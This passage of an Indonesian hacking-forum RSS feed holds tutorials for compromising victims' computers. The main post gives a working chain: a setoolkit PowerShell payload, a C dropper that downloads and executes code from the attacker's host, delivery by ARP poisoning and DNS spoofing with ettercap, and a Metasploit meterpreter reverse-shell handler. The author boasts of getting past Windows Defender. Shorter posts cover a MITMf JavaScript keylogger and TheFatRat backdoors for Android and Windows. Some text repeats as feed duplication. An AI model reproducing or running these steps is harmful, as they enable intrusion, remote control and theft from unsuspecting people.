<br />
<div style="text-align: left;" class="mycode_align">1. Buka METASPLOIT FRAMEWORK CONSOLE di terminal baru</div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo msfpayload</code></div></div></div>
<br />
<div style="text-align: left;" class="mycode_align">2. Setting Exploit, Listen Host &amp; Port</div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/zEjv4BYQ.png" width="400" height="200" alt="[Image: zEjv4BYQ.png]" class="mycode_img" /></div>
<br />
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&gt; use exploit/multi/handler<br />
&gt; set PAYLOAD windows/meterpreter/reverse_tcp<br />
&gt; set LHOST 192.168.56.1<br />
&gt; set LPORT 69<br />
&gt; exploit</code></div></div></div>
<div style="text-align: left;" class="mycode_align">Masukkin IP ente dan Port sesuai yang di set di payload awal tadi.</div>
<div style="text-align: left;" class="mycode_align">Sekarang tunggu dengan sabar sampai ada yang kena..</div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">TESTING DI WINDOWS 8</span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b">di Windows XP &amp; 7 udah ane test dan WORK, sorry ini ane maksimal test Win8. Mau test Win 8.1/Win10 gakuat, maklum laptop buzux dipake VirtualBox</span></div>
<br />
<span style="font-weight: bold;" class="mycode_b">BUKTI WINDOWS DEFENDER &amp; FIREWALL DALAM KEADAAN </span><span style="font-weight: bold;" class="mycode_b"><span style="color: #33cc33;" class="mycode_color"><span style="font-size: large;" class="mycode_size">ON </span></span></span>:<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/dpTgcmcY.png" width="400" height="200" alt="[Image: dpTgcmcY.png]" class="mycode_img" /></div>
<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/ihiBUBBT.png" width="400" height="200" alt="[Image: ihiBUBBT.png]" class="mycode_img" /></div>
<br />
<br />
<div style="text-align: left;" class="mycode_align">KORBAN :</div>
<br />
<div style="text-align: left;" class="mycode_align">- Saat korban mencoba mengakses web lain (misal : cinem*indo.stream) namun justru dialihkan ke alamat IP Attacker/Ane bray.</div>
<div style="text-align: left;" class="mycode_align">- Saat korban me-load index.html di web server ane, sama file index justru dialihkan ke <a href="http://192.168.56.1/trap.zip" target="_blank" class="mycode_url">http://192.168.56.1/trap.zip</a> biar korban otomatis download (Kalo browser nya Chrome gitu, kalo lainnya ditanyain dulu).</div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/ATwbE4Ly.png" width="400" height="200" alt="[Image: ATwbE4Ly.png]" class="mycode_img" /></div>
<br />
<div style="text-align: left;" class="mycode_align">- Abis di download, 70% korban mungkin secara tak sengaja membuka file trap.exe didalam nya.</div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/ZIorHfAe.png" width="400" height="200" alt="[Image: ZIorHfAe.png]" class="mycode_img" /></div>
<br />
<div style="text-align: left;" class="mycode_align">- File trap.exe tereksekusi,  maka akan mendownload otomatis (secara background) file pyld.txt dan mengeksekusinya.</div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/kYJbWGNu.png" width="400" height="200" alt="[Image: kYJbWGNu.png]" class="mycode_img" /></div>
<br />
<br />
<br />
<div style="text-align: left;" class="mycode_align">- Crott deh. </div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: large;" class="mycode_size"><span style="color: #33cc33;" class="mycode_color"><img src="https://i.imgbox.com/w2t17K0g.png" width="400" height="200" alt="[Image: w2t17K0g.png]" class="mycode_img" /></span></span></span></div>
<br />
<br />
<hr class="mycode_hr" />
<br />
Oke sekian post dari ane.. tak terasa udah hampir pagi. Kalo ada yang gamudeng monggo di komeng bray, tapi ane balesnya juga kalo sempet yo, dah ngantuk soalnyah<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: large;" class="mycode_size"><span style="color: #33cc33;" class="mycode_color">Bobo dolo ea beibz</span></span></span></div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: left;" class="mycode_align">Warning!</div>
<div style="text-align: left;" class="mycode_align">Buat ente yang merasa pingin hek satelit ato ngehex CIA sorry bray, mending gausah diterusin bacanya, salah kamar bray. TS masi folos nubi tjoepoeh imut kyutt unyu tralala.</div>
<br />
<div style="text-align: left;" class="mycode_align">Bingung mo nulis apaan, jadi gini intinya aing pingin syeer salah satu anu yang masih anu melewati AV lawas yang gapernah update.</div>
<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">Keterangan :</span></span><br />
1. IP Attacker : 192.168.56.1<br />
2. IP Victim : gatau ane mah, bodoamat yang penting bisa obok obok.<br />
<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">MEMASAK PAYLOAD BUAT MAKAN MALEM</span> :*</span></div>
<br />
<div style="text-align: left;" class="mycode_align">1. Jadi user root dulu biar afdol </div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo su</code></div></div></div>
<div style="text-align: left;" class="mycode_align">2. Buka setoolkit</div>
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># setoolkit</code></div></div>Kalo udah kebuka langsung aja pilih nomer 1 (Social Engineering Attacks) &gt; Pilih nomer 9 (Powershell attack vector) &gt; Pilih nomer 1 (Powershell Alphanumeric Shellcode Injector)<br />
Kalo udah masukin IP &amp; Port ente yang berperan sebagai attacker, kalo udah pilih no aja, Ctrl+C aja sampe setoolkit nutup dan balik ke terminal.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/syk4SmAE.png" width="400" height="200" alt="[Image: syk4SmAE.png]" class="mycode_img" /></div>
<br />
<br />
<div style="text-align: left;" class="mycode_align">2. Secara otomatis setoolkit bakal generate sebuah payload dan bakalan disimpen di <span style="font-weight: bold;" class="mycode_b">/root/.set/reports/powershell/</span> Jadi kita pindah aja ke direktori tsb dan liat isinya.</div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># cd /root/.set/reports/powershell/</code></div></div></div>
<br />
<div style="text-align: left;" class="mycode_align">Didalem nya akan ada sebuah file payload bernama <span style="font-weight: bold;" class="mycode_b">x86_powershell_injection.txt</span></div>
<div style="text-align: left;" class="mycode_align">Udah gitu kita pindah itu file ke web directory.</div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># mv x86_powershell_injection.txt /var/www/html/pyld.txt</code></div></div></div>
Oke ayok ikutan pindah dir ke sana juga.<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># cd /var/www/html/</code></div></div><br />
3. Sekarang ane ngoding sebuah source program pake bahasa C<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># nano trap.c</code></div></div><br />
Nih source nya :<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>#include &lt;stdio.h&gt;<br />
#include &lt;stdlib.h&gt;<br />
int main()<br />
{<br />
&nbsp;&nbsp;&nbsp;&nbsp;system("powershell.exe &#92;"IEX ((new-object net.webclient).downloadstring('http://192.168.56.1/pyld.txt'))&#92;"");<br />
&nbsp;&nbsp;&nbsp;&nbsp;return 0;<br />
}</code></div></div><br />
192.168.56.1 itu IP ente/attacker,   jadi fungsi program ini ntar saat dijalanin si korban bakalan ngunduh dan ngeksekusi file payload kita. Jadi komputer kita ntar juga bakal jadi webserver bentar.  <br />
<br />
<div style="text-align: left;" class="mycode_align">4. Compile source nya menjadi program (.exe)</div>
<br />
<div style="text-align: left;" class="mycode_align">Untuk melakukan cross-compilation pada linux kalian memerlukan MinGW</div>
<div style="text-align: left;" class="mycode_align"><a href="http://www.anwar.science/2016/12/cara-install-mingw-compiler-di-linux.html" target="_blank" class="mycode_url">Baca disini cara install nya</a></div>
<br />
<div style="text-align: left;" class="mycode_align">Cara ngompile nya gini</div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># i686-w64-mingw32-gcc -o trap.exe trap.c</code></div></div></div>
<br />
<div style="text-align: left;" class="mycode_align">5. Compress file program nya jadi zip</div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># zip trap.zip trap.exe</code></div></div></div>
<div style="text-align: left;" class="mycode_align">6. Buat file index.html yang bisa redirect ke file trap.zip</div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># nano index.html</code></div></div></div>
<div style="text-align: left;" class="mycode_align">Code nya begini nih :</div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/qoh3mmK6.png" width="400" height="200" alt="[Image: qoh3mmK6.png]" class="mycode_img" /></div>
<br />
<br />
<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">DNS SPOOFING</span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b">Opsional sih ini cara nebar nya gimana, yang penting korban kudu buka file <span style="text-decoration: underline;" class="mycode_u">trap.exe</span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-size: x-small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i"><span style="color: #ff6666;" class="mycode_color">*Kalau ente berada di isolated-network (misal : <DVZ_ME#0>.id) gausah pake dns spoofing, dan upload file <span style="text-decoration: underline;" class="mycode_u">pyld.txt</span> ke hosting pribadi atau apa yang penting bisa diliat korban, jadi sesuaiin juga IP dalam source program <span style="text-decoration: underline;" class="mycode_u">trap.exe</span></span></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-size: x-small;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b"><span style="color: #33cc66;" class="mycode_color">DNS Spoofing ini bakal berguna kalo ente ada di jaringan rumahan / warung wifi / pokoknya yang gak isolated-client (bisa arp poisoning / ping &amp; scan hosts lain)</span></span></span></div>
<br />
<br />
1. Edit konfigurasi ettercap<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># nano /etc/ettercap/etter.dns</code></div></div><br />
Cari kata microsof sucks, maka akan ketemu beberapa baris konfigurasi microsoft. Disable semua dengan menambahkan tanda pagar. Trus tambahin IP ente.<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/4Wqbqlt1.png" width="400" height="200" alt="[Image: 4Wqbqlt1.png]" class="mycode_img" /></div>
Ntar korban yang terspoof ketika ingin mengakses web apa saja bakalan dialihkan ke IP ente. Dan saat membuka index.html justru akan dialihkan untuk mendownload file <span style="text-decoration: underline;" class="mycode_u">trap.exe</span><br />
<br />
2. Mulai DNS Spoofing<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># ettercap -G</code></div></div><br />
- Klik tab <span style="font-weight: bold;" class="mycode_b">Sniff</span> &gt; Pilih <span style="font-weight: bold;" class="mycode_b">Uniffied sniffing... </span>&gt; Pilih Network interface yang dipakai [eth0/eth1/wlan0/wlan1]<br />
<br />
- Klik tab <span style="font-weight: bold;" class="mycode_b">Hosts</span> &gt; Pilih <span style="font-weight: bold;" class="mycode_b">Scan for hosts</span><br />
<br />
- Klik tab <span style="font-weight: bold;" class="mycode_b">Hosts</span> &gt; Pilih <span style="font-weight: bold;" class="mycode_b">Hosts list</span> &gt; Masukkan IP Gateway ke <span style="font-weight: bold;" class="mycode_b">Target 1 </span>&gt; Masukkan IP korban ke <span style="font-weight: bold;" class="mycode_b">Target 2</span>. Gatau IP nya? Masukin aja semua IP selain gateway ke Target 2.<br />
Cara liat IP Gateway, buka terminal baru trus :<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo route -n</code></div></div><br />
- Klik tab <span style="font-weight: bold;" class="mycode_b">Mitm</span> &gt; Pilih <span style="font-weight: bold;" class="mycode_b">Arp poisoning...</span> &gt; Centang pada <span style="font-weight: bold;" class="mycode_b">Sniff remote connections.</span><br />
<br />
- Klik tab <span style="font-weight: bold;" class="mycode_b">Plugins</span> &gt; Pilih <span style="font-weight: bold;" class="mycode_b">Manage the plugins </span>&gt; Klik 2x pada <span style="font-weight: bold;" class="mycode_b">dns_spoof </span>supaya aktif<br />
<br />
- Klik tab <span style="font-weight: bold;" class="mycode_b">Start</span> &gt; Pilih <span style="font-weight: bold;" class="mycode_b">Start sniffing</span><br />
<br />
<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">MENGAKTIFKAN WEB SERVER</span></span></div>
<br />
<br />
<div style="text-align: left;" class="mycode_align">Gini caranya, buka terminal baru dulu, trus :</div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo service apache2 start</code></div></div></div>
<br />
<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">LISTENING [b][u]METERPRETER DI </span></span>METASPLOIT [/u][/b]</div>
<br />
<div style="text-align: left;" class="mycode_align">1. Buka METASPLOIT FRAMEWORK CONSOLE di terminal baru</div>
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36; sudo msfpayload</code></div></div></div>
<br />
<div style="text-align: left;" class="mycode_align">2. Setting Exploit, Listen Host &amp; Port</div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/zEjv4BYQ.png" width="400" height="200" alt="[Image: zEjv4BYQ.png]" class="mycode_img" /></div>
<br />
<div style="text-align: left;" class="mycode_align"><div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&gt; use exploit/multi/handler<br />
&gt; set PAYLOAD windows/meterpreter/reverse_tcp<br />
&gt; set LHOST 192.168.56.1<br />
&gt; set LPORT 69<br />
&gt; exploit</code></div></div></div>
<div style="text-align: left;" class="mycode_align">Masukkin IP ente dan Port sesuai yang di set di payload awal tadi.</div>
<div style="text-align: left;" class="mycode_align">Sekarang tunggu dengan sabar sampai ada yang kena..</div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="text-decoration: underline;" class="mycode_u">TESTING DI WINDOWS 8</span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b">di Windows XP &amp; 7 udah ane test dan WORK, sorry ini ane maksimal test Win8. Mau test Win 8.1/Win10 gakuat, maklum laptop buzux dipake VirtualBox</span></div>
<br />
<span style="font-weight: bold;" class="mycode_b">BUKTI WINDOWS DEFENDER &amp; FIREWALL DALAM KEADAAN </span><span style="font-weight: bold;" class="mycode_b"><span style="color: #33cc33;" class="mycode_color"><span style="font-size: large;" class="mycode_size">ON </span></span></span>:<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/dpTgcmcY.png" width="400" height="200" alt="[Image: dpTgcmcY.png]" class="mycode_img" /></div>
<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/ihiBUBBT.png" width="400" height="200" alt="[Image: ihiBUBBT.png]" class="mycode_img" /></div>
<br />
<br />
<div style="text-align: left;" class="mycode_align">KORBAN :</div>
<br />
<div style="text-align: left;" class="mycode_align">- Saat korban mencoba mengakses web lain (misal : cinem*indo.stream) namun justru dialihkan ke alamat IP Attacker/Ane bray.</div>
<div style="text-align: left;" class="mycode_align">- Saat korban me-load index.html di web server ane, sama file index justru dialihkan ke <a href="http://192.168.56.1/trap.zip" target="_blank" class="mycode_url">http://192.168.56.1/trap.zip</a> biar korban otomatis download (Kalo browser nya Chrome gitu, kalo lainnya ditanyain dulu).</div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/ATwbE4Ly.png" width="400" height="200" alt="[Image: ATwbE4Ly.png]" class="mycode_img" /></div>
<br />
<div style="text-align: left;" class="mycode_align">- Abis di download, 70% korban mungkin secara tak sengaja membuka file trap.exe didalam nya.</div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/ZIorHfAe.png" width="400" height="200" alt="[Image: ZIorHfAe.png]" class="mycode_img" /></div>
<br />
<div style="text-align: left;" class="mycode_align">- File trap.exe tereksekusi,  maka akan mendownload otomatis (secara background) file pyld.txt dan mengeksekusinya.</div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="https://i.imgbox.com/kYJbWGNu.png" width="400" height="200" alt="[Image: kYJbWGNu.png]" class="mycode_img" /></div>
<br />
<br />
<br />
<div style="text-align: left;" class="mycode_align">- Crott deh. </div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: large;" class="mycode_size"><span style="color: #33cc33;" class="mycode_color"><img src="https://i.imgbox.com/w2t17K0g.png" width="400" height="200" alt="[Image: w2t17K0g.png]" class="mycode_img" /></span></span></span></div>
<br />
<br />
<hr class="mycode_hr" />
<br />
Oke sekian post dari ane.. tak terasa udah hampir pagi. Kalo ada yang gamudeng monggo di komeng bray, tapi ane balesnya juga kalo sempet yo, dah ngantuk soalnyah<br />
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-weight: bold;" class="mycode_b"><span style="font-size: large;" class="mycode_size"><span style="color: #33cc33;" class="mycode_color">Bobo dolo ea beibz</span></span></span></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[Old but Gold] The Javascript Keylogger: Another Level of Tapping]]></title>
			<link>https://www.backboxindonesia.or.id/thread-167.html</link>
			<pubDate>Mon, 12 Sep 2016 02:55:20 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-167.html</guid>
			<description><![CDATA[hola linuxer setanah air, dalem kesempatan kali ini ane mau berbagi tentang kehebatan tools MITMf alias Man In The Middle framework yang jadi salah 1 tool di <a href="http://dracos-linux.org/" target="_blank" class="mycode_url">DracOs Linux</a>. Tool ini ga beda jauh sama bettercap, kenapa? karena basicnya memang sebuah tool untuk man in the middle namun ada 1 yang bikin MITMf spesial yaitu javascript keylogger yang udah langsung disediain dan siap pake. Dalam video ini ane bakal  ngetes javascript keylogger si MITMf ini, monggo dinikmati<br />
<br />
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/NuK9i7yiVz0" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<br />
<div style="text-align: left;" class="mycode_align">sumur dan link penting:<br />
<a href="https://github.com/byt3bl33d3r/MITMf/wiki/Installation" target="_blank" class="mycode_url">https://github.com/byt3bl33d3r/MITMf/wiki/Installation</a><br />
<a href="http://stackoverflow.com/questions/12647266/where-is-virtualenvwrapper-sh-after-pip-install" target="_blank" class="mycode_url">http://stackoverflow.com/questions/12647...ip-install</a><br />
<a href="https://github.com/byt3bl33d3r/MITMf/issues/240" target="_blank" class="mycode_url">https://github.com/byt3bl33d3r/MITMf/issues/240</a><br />
<a href="http://werkzeug.pocoo.org/docs/0.11/installation/" target="_blank" class="mycode_url">http://werkzeug.pocoo.org/docs/0.11/installation/</a><br />
<a href="https://github.com/pyca/cryptography/issues/2280" target="_blank" class="mycode_url">https://github.com/pyca/cryptography/issues/2280</a><br />
<a href="https://pypi.python.org/pypi/NetfilterQueue/0.3" target="_blank" class="mycode_url">https://pypi.python.org/pypi/NetfilterQueue/0.3</a></div></div>]]></description>
			<content:encoded><![CDATA[hola linuxer setanah air, dalem kesempatan kali ini ane mau berbagi tentang kehebatan tools MITMf alias Man In The Middle framework yang jadi salah 1 tool di <a href="http://dracos-linux.org/" target="_blank" class="mycode_url">DracOs Linux</a>. Tool ini ga beda jauh sama bettercap, kenapa? karena basicnya memang sebuah tool untuk man in the middle namun ada 1 yang bikin MITMf spesial yaitu javascript keylogger yang udah langsung disediain dan siap pake. Dalam video ini ane bakal  ngetes javascript keylogger si MITMf ini, monggo dinikmati<br />
<br />
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/NuK9i7yiVz0" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<br />
<div style="text-align: left;" class="mycode_align">sumur dan link penting:<br />
<a href="https://github.com/byt3bl33d3r/MITMf/wiki/Installation" target="_blank" class="mycode_url">https://github.com/byt3bl33d3r/MITMf/wiki/Installation</a><br />
<a href="http://stackoverflow.com/questions/12647266/where-is-virtualenvwrapper-sh-after-pip-install" target="_blank" class="mycode_url">http://stackoverflow.com/questions/12647...ip-install</a><br />
<a href="https://github.com/byt3bl33d3r/MITMf/issues/240" target="_blank" class="mycode_url">https://github.com/byt3bl33d3r/MITMf/issues/240</a><br />
<a href="http://werkzeug.pocoo.org/docs/0.11/installation/" target="_blank" class="mycode_url">http://werkzeug.pocoo.org/docs/0.11/installation/</a><br />
<a href="https://github.com/pyca/cryptography/issues/2280" target="_blank" class="mycode_url">https://github.com/pyca/cryptography/issues/2280</a><br />
<a href="https://pypi.python.org/pypi/NetfilterQueue/0.3" target="_blank" class="mycode_url">https://pypi.python.org/pypi/NetfilterQueue/0.3</a></div></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Hacking Android Using TheFatRat dan Metasploit]]></title>
			<link>https://www.backboxindonesia.or.id/thread-165.html</link>
			<pubDate>Thu, 01 Sep 2016 03:40:25 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-165.html</guid>
			<description><![CDATA[hello gan thread kali ini ane mau share hacking android dengan tool fatrat sebagai backdoornya kalo kemaren exploit windows nah ini targetnya android, yok langsung aja mendarat..<br />
<br />
bikin backdoornya dulu :<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>https://asciinema.org/a/a9hn2qqllasm8sw51t9jzcgm6</code></div></div><br />
open metasploit :<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo msfconsole<br />
use exploit/multi/handler<br />
set payload android/meterpreter/reverse_tcp<br />
set lhost "ipente"<br />
set lport "default"<br />
exploit</code></div></div><br />
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/ToKoy1xOtJA" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>
<br />
sampe disini ente kirim backdoor ke korban entah mau pakek teknik apa  <span style="font-style: italic;" class="mycode_i">"use your brain"</span><br />
kalo mau outdoor network mesti set dulu router, GGL ada kayaknya ane lupa ngeset  :P <br />
kalo backdoor udah kebuka entar meterpreter session opened, sampe disini ente udh masuk ke device korban terserah mau ngapain suka2 ente  :D ketik help.<br />
sekian semoga bermanfaat gunakan dengan bijak.<br />
<br />
<div style="text-align: center;" class="mycode_align">source : <a href="http://www.cyber-space.ga/2016/08/hacking-android-dengan-fatrat-dan.html" target="_blank" class="mycode_url">here</a></div>]]></description>
			<content:encoded><![CDATA[hello gan thread kali ini ane mau share hacking android dengan tool fatrat sebagai backdoornya kalo kemaren exploit windows nah ini targetnya android, yok langsung aja mendarat..<br />
<br />
bikin backdoornya dulu :<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>https://asciinema.org/a/a9hn2qqllasm8sw51t9jzcgm6</code></div></div><br />
open metasploit :<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo msfconsole<br />
use exploit/multi/handler<br />
set payload android/meterpreter/reverse_tcp<br />
set lhost "ipente"<br />
set lport "default"<br />
exploit</code></div></div><br />
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/ToKoy1xOtJA" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></div>
<br />
sampe disini ente kirim backdoor ke korban entah mau pakek teknik apa  <span style="font-style: italic;" class="mycode_i">"use your brain"</span><br />
kalo mau outdoor network mesti set dulu router, GGL ada kayaknya ane lupa ngeset  :P <br />
kalo backdoor udah kebuka entar meterpreter session opened, sampe disini ente udh masuk ke device korban terserah mau ngapain suka2 ente  :D ketik help.<br />
sekian semoga bermanfaat gunakan dengan bijak.<br />
<br />
<div style="text-align: center;" class="mycode_align">source : <a href="http://www.cyber-space.ga/2016/08/hacking-android-dengan-fatrat-dan.html" target="_blank" class="mycode_url">here</a></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Exploit Windows Using TheFatRat dan Metasploit]]></title>
			<link>https://www.backboxindonesia.or.id/thread-156.html</link>
			<pubDate>Sat, 30 Jul 2016 12:20:37 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-156.html</guid>
			<description><![CDATA[Fatrat adalah backdoor creator yang di gunakan untuk meremote access perangkat lunak seperti windows, android, mac dan masih banyak lagi yang bisa di gunakan oleh thefatrat ini.<br />
langsung aja gan lets go..<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Install fatrat :</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>git clone https://github.com/Screetsec/TheFatRat.git<br />
cd TheFatRat<br />
chmod +x fatrat ; chmod +x powerfull.sh<br />
sudo ./fatrat</code></div></div><br />
<span style="font-weight: bold;" class="mycode_b">Make Backdoornya :</span><br />
<a href="https://asciinema.org/a/76d9tcl1uiikipv8dhjr2vow8" target="_blank" class="mycode_url">https://asciinema.org/a/76d9tcl1uiikipv8dhjr2vow8</a><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Run Metasploit :</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo msfconsole<br />
use exploit/multi/handler<br />
set payload windows/meterpreter/reverse_tcp<br />
set lhost "ip ente"<br />
set lport 444<br />
exploit</code></div></div>atau klik ini ~&gt; <a href="https://asciinema.org/a/7wh8cppwm5a3glwsezcus8riw" target="_blank" class="mycode_url">https://asciinema.org/a/7wh8cppwm5a3glwsezcus8riw</a><br />
<br />
Belum paham tonton video tutorialnya disini ~&gt; <span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font"><a href="https://youtu.be/Aw1mxwpmkd4" target="_blank" class="mycode_url">https://youtu.be/Aw1mxwpmkd4</a> atau di bawah ini:</span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="font-size: medium;" class="mycode_size"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/Aw1mxwpmkd4" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-size: medium;" class="mycode_size">Source : <a href="http://www.cyber-space.ga/2016/07/exploit-windows-using-thefatrat-and.html" target="_blank" class="mycode_url">http://www.cyber-space.ga/2016/07/exploi...t-and.html</a></span></div>]]></description>
			<content:encoded><![CDATA[Fatrat adalah backdoor creator yang di gunakan untuk meremote access perangkat lunak seperti windows, android, mac dan masih banyak lagi yang bisa di gunakan oleh thefatrat ini.<br />
langsung aja gan lets go..<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Install fatrat :</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>git clone https://github.com/Screetsec/TheFatRat.git<br />
cd TheFatRat<br />
chmod +x fatrat ; chmod +x powerfull.sh<br />
sudo ./fatrat</code></div></div><br />
<span style="font-weight: bold;" class="mycode_b">Make Backdoornya :</span><br />
<a href="https://asciinema.org/a/76d9tcl1uiikipv8dhjr2vow8" target="_blank" class="mycode_url">https://asciinema.org/a/76d9tcl1uiikipv8dhjr2vow8</a><br />
<br />
<span style="font-weight: bold;" class="mycode_b">Run Metasploit :</span><br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>sudo msfconsole<br />
use exploit/multi/handler<br />
set payload windows/meterpreter/reverse_tcp<br />
set lhost "ip ente"<br />
set lport 444<br />
exploit</code></div></div>atau klik ini ~&gt; <a href="https://asciinema.org/a/7wh8cppwm5a3glwsezcus8riw" target="_blank" class="mycode_url">https://asciinema.org/a/7wh8cppwm5a3glwsezcus8riw</a><br />
<br />
Belum paham tonton video tutorialnya disini ~&gt; <span style="font-size: medium;" class="mycode_size"><span style="font-family: Times New Roman;" class="mycode_font"><a href="https://youtu.be/Aw1mxwpmkd4" target="_blank" class="mycode_url">https://youtu.be/Aw1mxwpmkd4</a> atau di bawah ini:</span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="font-size: medium;" class="mycode_size"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/Aw1mxwpmkd4" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="font-size: medium;" class="mycode_size">Source : <a href="http://www.cyber-space.ga/2016/07/exploit-windows-using-thefatrat-and.html" target="_blank" class="mycode_url">http://www.cyber-space.ga/2016/07/exploi...t-and.html</a></span></div>]]></content:encoded>
		</item>
		<item>
